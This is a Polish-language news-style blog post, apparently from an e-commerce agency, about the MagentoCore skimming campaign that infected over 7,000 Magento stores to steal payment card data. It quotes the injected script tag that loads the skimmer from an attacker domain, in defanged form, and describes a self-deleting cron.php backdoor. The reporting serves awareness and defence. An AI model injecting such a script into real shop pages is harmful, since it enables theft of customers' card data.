ul. Strzegomska 2-4
53-611 Wrocław
NIP 8992786490
KRS 0000608120
REGON 363987723
Global4Net Sp. z o. o.
+48 71 358 41 00
© 2009 – Global4Net. All Rights Reserved.
W przeciągu pół roku przestępcy umieścili szkodliwe skrypty na ponad 7 tysiącach sklepów opartych o silnik Magento. W wyniku tego procederu hakerzy kradli dane kart płatniczych klientów, zyskując dostęp do pieniędzy na kontach bankowych.
Według eksperta Willema de Groota, który odkrył zagrożenie jest to najbardziej agresywny skrypt tego typu powstały do tej pory w przypadku Magento. Hakerzy zainfekowali już 7 339 sklepów Magento skimerem o nazwie MagentoCore, który pobiera dane z kart płatniczych od użytkowników, którzy kupili na tych stronach. Szkodliwy skrypt ładuje się na strony kasowe sklepu i kradnie dane karty płatniczej dostarczone przez użytkowników i wysyła je na serwer kontrolowany przez atakującego. Willem de Groot poinformował, że kampania hakerska obejmuje skimmer skrypt załadowany z domeny magentocore.net.
Kampania wciąż trwa, a hakerzy atakują nowe sklepy Magento w tempie od 50 do 60 stron dziennie. Wśród zainfekowanych sklepów są również firmy notowane na giełdzie obracające milionowymi kwotami. 1450 spośród ponad 7339 zainfekowanych sklepów opartych o platformę Magento miało przez pół roku w kodzie umieszczony szkodliwy skrypt. W tym czasie zaatakowane serwisy nie zareagowały na wyciek danych. Reszcie sklepów zajmowało to średnio kilka tygodni.
Gdy atakującemu uda się złamać kod strony dodaje do szablonu HTML osadzony fragment kodu JavaScript:
<script type=”text/javascript” src=”hxxps://magentocore.net/mage/mage.js”></script>
Skrypt ma za zadanie rejestrować składanie zamówień przez klientów i wysyła je na serwer „magentocore.net”. Złośliwe oprogramowanie dodaje backdoor do cron.php, który będzie okresowo pobierał szkodliwy kod, a po uruchomieniu usuwał się sam. Według Bleeping Computer, w którym cytowany jest Yonathan Klijnsma, Badacz ds. Zagrożenia dla RiskIQ, kampania MagentoCore jest częścią większej kampanii kradzieży kart zwanej MageCart, która była aktywna od końca 2015 roku.
Według de Groota, obecnie 4,2% wszystkich sklepów Magento jest zainfekowanych jednym lub większą liczbą skimmerów.
Napisz do nas